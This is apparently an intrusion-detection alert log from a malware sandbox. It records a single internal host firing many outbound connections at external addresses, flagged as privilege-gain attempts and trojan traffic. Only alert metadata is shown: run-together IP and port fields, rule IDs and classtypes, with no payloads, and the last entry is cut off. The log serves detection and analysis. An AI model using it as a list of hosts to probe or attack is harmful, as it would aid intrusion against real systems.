            Timestamp:192.168.2.2374.43.220.2147056802835221 10/23/22-17:58:29.395457
            SID:2835221
            Source Port:47056
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.174.237.19051532802846380 10/23/22-17:56:59.845508
            SID:2846380
            Source Port:51532
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2323.78.152.2839192802835222 10/23/22-17:57:58.690532
            SID:2835222
            Source Port:39192
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23197.26.35.21458358802835222 10/23/22-17:58:16.403361
            SID:2835222
            Source Port:58358
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2380.82.116.13850362802846457 10/23/22-17:57:14.346537
            SID:2846457
            Source Port:50362
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2338.47.156.7939544802841623 10/23/22-17:57:55.465892
            SID:2841623
            Source Port:39544
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2337.202.2.6733052802846457 10/23/22-17:57:28.782744
            SID:2846457
            Source Port:33052
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.86.64.8551606802027121 10/23/22-17:57:56.515557
            SID:2027121
            Source Port:51606
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.101.90.3059736802027121 10/23/22-17:57:33.430831
            SID:2027121
            Source Port:59736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23200.145.71.23549414802846380 10/23/22-17:58:09.690253
            SID:2846380
            Source Port:49414
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.216.0.22834688802846380 10/23/22-17:58:33.195693
            SID:2846380
            Source Port:34688
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.232.21.240.12346444802846457 10/23/22-17:57:28.770639
            SID:2846457
            Source Port:46444
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.216.179.12034398802027121 10/23/22-17:58:24.028408
            SID:2027121
            Source Port:34398
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23104.251.238.6636202802841623 10/23/22-17:57:35.552301
            SID:2841623
            Source Port:36202
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23206.214.82.2459664802846380 10/23/22-17:58:39.695808
            SID:2846380
            Source Port:59664
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2352.194.164.20645512802835221 10/23/22-17:57:07.686714
            SID:2835221
            Source Port:45512
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.99.36.1733822802027121 10/23/22-17:58:02.118646
            SID:2027121
            Source Port:33822
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.232.17.169.20059248802846457 10/23/22-17:57:51.051923
            SID:2846457
            Source Port:59248
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.235.189.134.839684802846457 10/23/22-17:56:55.096175
            SID:2846457
            Source Port:39684
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23200.81.145.11055642802846380 10/23/22-17:58:09.155306
            SID:2846380
            Source Port:55642
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.204.163.13051070802027121 10/23/22-17:57:02.607669
            SID:2027121
            Source Port:51070
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2389.248.97.9048108802846457 10/23/22-17:57:38.022296
            SID:2846457
            Source Port:48108
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2380.31.17.5649874802846457 10/23/22-17:58:26.510943
            SID:2846457
            Source Port:49874
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23206.210.111.25441284802846380 10/23/22-17:58:36.878015
            SID:2846380
            Source Port:41284
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.161.241.15233598802846457 10/23/22-17:57:38.016631
            SID:2846457
            Source Port:33598
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.158.104.19756618802846457 10/23/22-17:57:38.026305
            SID:2846457
            Source Port:56618
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2372.32.131.2447166802841623 10/23/22-17:57:11.261983
            SID:2841623
            Source Port:47166
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.107.208.18041452802027121 10/23/22-17:57:21.052771
            SID:2027121
            Source Port:41452
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.65.51.20445258802027121 10/23/22-17:57:13.026267
            SID:2027121
            Source Port:45258
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.100.184.17750644802027121 10/23/22-17:56:53.267528
            SID:2027121
            Source Port:50644
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23200.53.139.11446620802846380 10/23/22-17:57:13.964930
            SID:2846380
            Source Port:46620
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23206.123.118.14037914802846380 10/23/22-17:57:40.679711
            SID:2846380
            Source Port:37914
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2391.92.129.10059522802841623 10/23/22-17:57:57.973921
            SID:2841623
            Source Port:59522
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23156.229.201.7949602802841623 10/23/22-17:58:11.633000
            SID:2841623
            Source Port:49602
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2386.123.49.20149264802846380 10/23/22-17:58:19.952008
            SID:2846380
            Source Port:49264
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23181.214.9.3141092802846380 10/23/22-17:56:55.612964
            SID:2846380
            Source Port:41092
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.221.201.14334814802027121 10/23/22-17:58:17.358396
            SID:2027121
            Source Port:34814
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23213.32.16.9953078802846380 10/23/22-17:58:33.195816
            SID:2846380
            Source Port:53078
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.101.14.7040732802027121 10/23/22-17:56:58.439299
            SID:2027121
            Source Port:40732
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.232.19.132.9958388802846457 10/23/22-17:57:07.232331
            SID:2846457
            Source Port:58388
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23195.201.23.5638570802846457 10/23/22-17:58:30.729268
            SID:2846457
            Source Port:38570
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.112.181.21934426802846380 10/23/22-17:56:49.792313
            SID:2846380
            Source Port:34426
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23156.242.132.8155596802841623 10/23/22-17:58:37.853344
            SID:2841623
            Source Port:55596
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.216.53.11044988802027121 10/23/22-17:57:28.459897
            SID:2027121
            Source Port:44988
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2389.29.194.24133250802846457 10/23/22-17:58:32.905329
            SID:2846457
            Source Port:33250
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23168.181.187.25454136802841623 10/23/22-17:57:16.449081
            SID:2841623
            Source Port:54136
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.33.237.14935768802846457 10/23/22-17:58:32.888660
            SID:2846457
            Source Port:35768
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.242.183.5448310802846380 10/23/22-17:57:29.196463
            SID:2846380
            Source Port:48310
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2382.194.104.22949784802846380 10/23/22-17:58:06.153292
            SID:2846380
            Source Port:49784
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.221.240.8948366802027121 10/23/22-17:58:36.463499
            SID:2027121
            Source Port:48366
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.216.179.4142042802027121 10/23/22-17:56:48.803851
            SID:2027121
            Source Port:42042
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2345.135.122.3860300802841623 10/23/22-17:57:46.472229
            SID:2841623
            Source Port:60300
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23188.138.163.22451372802846457 10/23/22-17:57:00.253988
            SID:2846457
            Source Port:51372
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.232.218.110.5346692802846457 10/23/22-17:57:50.386273
            SID:2846457
            Source Port:46692
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.124.247.656950802027121 10/23/22-17:57:34.925735
            SID:2027121
            Source Port:56950
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2385.17.140.1638068802846457 10/23/22-17:57:41.186656
            SID:2846457
            Source Port:38068
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23188.226.242.2847018802846457 10/23/22-17:57:47.809135
            SID:2846457
            Source Port:47018
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.188.195.18451004802846380 10/23/22-17:57:18.575363
            SID:2846380
            Source Port:51004
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.124.66.5838904802027121 10/23/22-17:56:58.157811
            SID:2027121
            Source Port:38904
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.199.88.13848756802027121 10/23/22-17:57:21.093414
            SID:2027121
            Source Port:48756
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2382.198.77.25354220802846380 10/23/22-17:58:06.175330
            SID:2846380
            Source Port:54220
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.92.111.13534280802846457 10/23/22-17:58:17.678157
            SID:2846457
            Source Port:34280
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2378.230.187.4353298802846457 10/23/22-17:58:28.643775
            SID:2846457
            Source Port:53298
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23195.216.39.5836876802846457 10/23/22-17:58:30.763687
            SID:2846457
            Source Port:36876
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2382.64.185.16054456802846380 10/23/22-17:57:54.175536
            SID:2846380
            Source Port:54456
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.251.225.20148082802846457 10/23/22-17:58:32.892637
            SID:2846457
            Source Port:48082
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2361.6.200.14240702802846457 10/23/22-17:57:20.919307
            SID:2846457
            Source Port:40702
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.209.229.16442788802027121 10/23/22-17:56:51.064127
            SID:2027121
            Source Port:42788
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.104.29.20848330802027121 10/23/22-17:58:07.403642
            SID:2027121
            Source Port:48330
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2337.77.74.2554966528692027339 10/23/22-17:58:30.489822
            SID:2027339
            Source Port:54966
            Destination Port:52869
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2380.85.21.6055272802846457 10/23/22-17:57:09.771575
            SID:2846457
            Source Port:55272
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.9.26.9258688802846457 10/23/22-17:58:17.716270
            SID:2846457
            Source Port:58688
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2382.165.71.12838202802846380 10/23/22-17:58:06.174589
            SID:2846380
            Source Port:38202
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23197.166.86.13836714802841623 10/23/22-17:56:55.865563
            SID:2841623
            Source Port:36714
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.222.146.1942650802846457 10/23/22-17:57:16.979034
            SID:2846457
            Source Port:42650
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23122.201.66.6058952802846457 10/23/22-17:58:35.080206
            SID:2846457
            Source Port:58952
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.101.201.9950354802027121 10/23/22-17:57:12.971445
            SID:2027121
            Source Port:50354
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.235.149.93.12047320802846457 10/23/22-17:57:35.685100
            SID:2846457
            Source Port:47320
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.94.202.14941872802846457 10/23/22-17:58:26.402400
            SID:2846457
            Source Port:41872
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.96.178.22050648802027121 10/23/22-17:57:52.320435
            SID:2027121
            Source Port:50648
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.235.133.103.7253228802846457 10/23/22-17:57:35.659143
            SID:2846457
            Source Port:53228
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.235.9.198.1949044802846457 10/23/22-17:56:55.093874
            SID:2846457
            Source Port:49044
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23188.65.18.11042522802846457 10/23/22-17:57:47.821744
            SID:2846457
            Source Port:42522
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.235.205.193.4854026802846457 10/23/22-17:57:35.654428
            SID:2846457
            Source Port:54026
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23122.116.94.9237090802835221 10/23/22-17:57:28.658822
            SID:2835221
            Source Port:37090
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23156.241.63.24946378802835222 10/23/22-17:57:58.955977
            SID:2835222
            Source Port:46378
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.208.249.16341294802027121 10/23/22-17:57:13.368317
            SID:2027121
            Source Port:41294
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2346.101.143.10554114802846457 10/23/22-17:58:23.966848
            SID:2846457
            Source Port:54114
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.198.127.14154030802027121 10/23/22-17:57:21.283853
            SID:2027121
            Source Port:54030
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2379.143.177.11741010802835221 10/23/22-17:57:01.100624
            SID:2835221
            Source Port:41010
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2361.239.169.10942960802846457 10/23/22-17:58:02.984285
            SID:2846457
            Source Port:42960
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23216.197.110.24958620802835222 10/23/22-17:58:32.149349
            SID:2835222
            Source Port:58620
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23213.27.82.1533414802846380 10/23/22-17:56:58.268393
            SID:2846380
            Source Port:33414
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2335.76.110.7749512802841623 10/23/22-17:57:43.028125
            SID:2841623
            Source Port:49512
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.105.33.4943682802027121 10/23/22-17:58:37.516252
            SID:2027121
            Source Port:43682
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.168.225.7651838802027121 10/23/22-17:57:23.621204
            SID:2027121
            Source Port:51838
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23188.127.227.537096802846457 10/23/22-17:58:17.689048
            SID:2846457
            Source Port:37096
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.232.21.167.17850914802846457 10/23/22-17:57:50.347635
            SID:2846457
            Source Port:50914
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23164.46.38.21440992802846457 10/23/22-17:56:52.405053
            SID:2846457
            Source Port:40992
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23156.234.29.10749996802835221 10/23/22-17:57:16.579158
            SID:2835221
            Source Port:49996
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23181.212.129.4058548802846380 10/23/22-17:57:25.375918
            SID:2846380
            Source Port:58548
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.86.106.1436922802027121 10/23/22-17:57:33.493683
            SID:2027121
            Source Port:36922
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2346.167.244.7350194802846457 10/23/22-17:58:15.369700
            SID:2846457
            Source Port:50194
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2346.227.228.12348044802846457 10/23/22-17:58:23.919255
            SID:2846457
            Source Port:48044
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.131.48.14152828802027121 10/23/22-17:58:37.349008
            SID:2027121
            Source Port:52828
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23142.217.11.1363890475472835222 10/23/22-17:57:04.158370
            SID:2835222
            Source Port:38904
            Destination Port:7547
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.159.151.19138070802027121 10/23/22-17:57:31.198661
            SID:2027121
            Source Port:38070
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.235.182.248.853140802846457 10/23/22-17:57:35.592639
            SID:2846457
            Source Port:53140
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23176.31.131.5048328802841623 10/23/22-17:57:42.978234
            SID:2841623
            Source Port:48328
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23103.122.247.12445666802841623 10/23/22-17:57:55.522647
            SID:2841623
            Source Port:45666
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.100.200.1951046802027121 10/23/22-17:57:10.331083
            SID:2027121
            Source Port:51046
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23169.197.105.12555642802846380 10/23/22-17:56:58.117829
            SID:2846380
            Source Port:55642
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.115.221.758258802846457 10/23/22-17:57:41.272377
            SID:2846457
            Source Port:58258
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23188.93.57.22634070802846457 10/23/22-17:58:07.975888
            SID:2846457
            Source Port:34070
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23164.138.115.15240572528692027339 10/23/22-17:57:22.360224
            SID:2027339
            Source Port:40572
            Destination Port:52869
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23213.139.90.6856982802846380 10/23/22-17:56:39.207635
            SID:2846380
            Source Port:56982
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2384.113.79.17847614802846457 10/23/22-17:58:15.349677
            SID:2846457
            Source Port:47614
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.100.149.20560382802027121 10/23/22-17:57:16.182795
            SID:2027121
            Source Port:60382
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23144.76.31.1473692480802841623 10/23/22-17:57:46.449872
            SID:2841623
            Source Port:36924
            Destination Port:8080
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.74.203.18250200802027121 10/23/22-17:58:25.658198
            SID:2027121
            Source Port:50200
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.235.251.51.22643580802846457 10/23/22-17:57:03.002530
            SID:2846457
            Source Port:43580
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.142.91.24144480802027121 10/23/22-17:57:13.187469
            SID:2027121
            Source Port:44480
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23110.43.204.8247202802846457 10/23/22-17:57:43.762005
            SID:2846457
            Source Port:47202
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2361.241.44.1348008802846457 10/23/22-17:57:50.923581
            SID:2846457
            Source Port:48008
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.179.132.22838894802027121 10/23/22-17:57:12.973047
            SID:2027121
            Source Port:38894
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23195.29.82.2341586802846457 10/23/22-17:57:59.916298
            SID:2846457
            Source Port:41586
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.216.184.21635280802027121 10/23/22-17:57:54.640552
            SID:2027121
            Source Port:35280
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.112.35.11135672802027121 10/23/22-17:58:29.914258
            SID:2027121
            Source Port:35672
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23200.123.142.8537142802846380 10/23/22-17:57:58.047528
            SID:2846380
            Source Port:37142
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.102.76.10854104802846380 10/23/22-17:58:33.254434
            SID:2846380
            Source Port:54104
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.79.109.20452060802027121 10/23/22-17:57:16.196003
            SID:2027121
            Source Port:52060
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2385.116.124.11460230802846457 10/23/22-17:57:31.285712
            SID:2846457
            Source Port:60230
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.239.222.953806802846380 10/23/22-17:56:49.757764
            SID:2846380
            Source Port:53806
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.216.187.19551932802027121 10/23/22-17:58:10.243378
            SID:2027121
            Source Port:51932
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23200.183.48.17441148802846380 10/23/22-17:57:43.908593
            SID:2846380
            Source Port:41148
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23122.249.243.23437700802846457 10/23/22-17:58:20.130052
            SID:2846457
            Source Port:37700
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2380.151.86.19950792802846457 10/23/22-17:58:13.019043
            SID:2846457
            Source Port:50792
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.79.144.3344066802846380 10/23/22-17:57:55.407757
            SID:2846380
            Source Port:44066
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.241.201.9042092802846457 10/23/22-17:58:37.542131
            SID:2846457
            Source Port:42092
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.232.182.109.15639428802846457 10/23/22-17:57:03.498337
            SID:2846457
            Source Port:39428
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2379.106.155.155628475472023548 10/23/22-17:56:53.678013
            SID:2023548
            Source Port:56284
            Destination Port:7547
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23156.254.104.18939108802835222 10/23/22-17:57:23.500357
            SID:2835222
            Source Port:39108
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.100.220.11954706802027121 10/23/22-17:57:49.369995
            SID:2027121
            Source Port:54706
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23213.63.142.7745876802846380 10/23/22-17:57:54.148119
            SID:2846380
            Source Port:45876
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23200.122.88.158840802846380 10/23/22-17:57:43.224412
            SID:2846380
            Source Port:58840
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2346.28.44.12760174802846457 10/23/22-17:58:23.965267
            SID:2846457
            Source Port:60174
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23195.20.52.18047834802846457 10/23/22-17:56:43.200673
            SID:2846457
            Source Port:47834
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.183.53.8554192802027121 10/23/22-17:56:53.257650
            SID:2027121
            Source Port:54192
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2346.101.80.4854414802846457 10/23/22-17:58:23.936940
            SID:2846457
            Source Port:54414
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.18.100.16160860802846380 10/23/22-17:57:49.425657
            SID:2846380
            Source Port:60860
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23171.4.45.20138518802846457 10/23/22-17:56:55.069504
            SID:2846457
            Source Port:38518
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2346.3.113.18542070802846457 10/23/22-17:58:05.661025
            SID:2846457
            Source Port:42070
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2384.238.211.17251832802846457 10/23/22-17:57:56.410084
